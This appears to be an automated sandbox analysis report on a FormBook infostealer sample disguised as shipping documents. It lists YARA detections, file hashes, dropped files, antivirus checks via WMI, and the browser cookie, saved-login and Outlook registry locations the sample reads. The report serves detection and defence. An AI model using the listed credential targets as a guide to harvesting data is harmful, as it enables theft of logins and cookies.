Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1742172690.0000000001960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3848860460.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849067022.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3852328512.00000000051E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849139713.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1741455772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3850140955.00000000032D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1744390860.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\SecEdit.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1742172690.0000000001960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3848860460.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849067022.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3852328512.00000000051E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849139713.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1741455772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3850140955.00000000032D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1744390860.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Windows Analysis Report
Original Shipping Documents.scr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1674192
Product:	CloudBasic
Start time:	16:03:30
Start date:	25.04.2025
Sample:	Original Shipping Documents.scr.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	3c67aeebbdc9b5fb68e8fbe01ddee0cc
SHA1:	f3fefd270eeb1b6c7d0687b67103bff06b6a071e
SHA256:	10e7df181627a2f66999dc4bf87095501b2e69833efd4ea6262e27f0b5b4b272
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Original Shipping Documents.scr.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xHOAJKcJeCXuc.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	9A8E8C8CDBDA6772FAC1C51A88DC89B6	B0E88CCF26816A3037ED18E26DBB3005FAB1ECBA	096217CDF15586E58ABFCB3877E8EEAB2FA607CE4D8D47DA167D34CBDD556AFD
C:\Users\user\AppData\Local\Temp\1US156H	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	2791D27717CAB5981A0EA5AD07EE6B64	1ACFA3E6B2D3A682CA918D6C1AA4AEBFBA2D9B75	A2D12FE1A445318E2A559FA65998843F50469BEDB41B0F8EBEF008DB6EEE1A7F
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he5yqd5i.wg2.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htxmkezj.mzf.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixwb1nmf.whc.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnk1cqtl.jhi.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv1bi42z.goc.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnklbzb0.kdf.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xiu33xih.geh.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xui5rqok.ozw.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\tmp1E8.tmp	XML 1.0 document, ASCII text	74B1706FD5AA976DA00BC0B650403BD5	AD4F0B2C8B60E01E6D94E799D5E801FD28150E0C	C54E944E442DD15214F9E007121E211EDB1124B20CE6FDDFD4120B8340C5195B
C:\Users\user\AppData\Local\Temp\tmp1FA1.tmp	XML 1.0 document, ASCII text	74B1706FD5AA976DA00BC0B650403BD5	AD4F0B2C8B60E01E6D94E799D5E801FD28150E0C	C54E944E442DD15214F9E007121E211EDB1124B20CE6FDDFD4120B8340C5195B
C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	3C67AEEBBDC9B5FB68E8FBE01DDEE0CC	F3FEFD270EEB1B6C7D0687B67103BFF06B6A071E	10E7DF181627A2F66999DC4BF87095501B2E69833EFD4EA6262E27F0B5B4B272
C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309

Windows Analysis Report Original Shipping Documents.scr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Original Shipping Documents.scr.exe

Malware Threat Intel
Provided by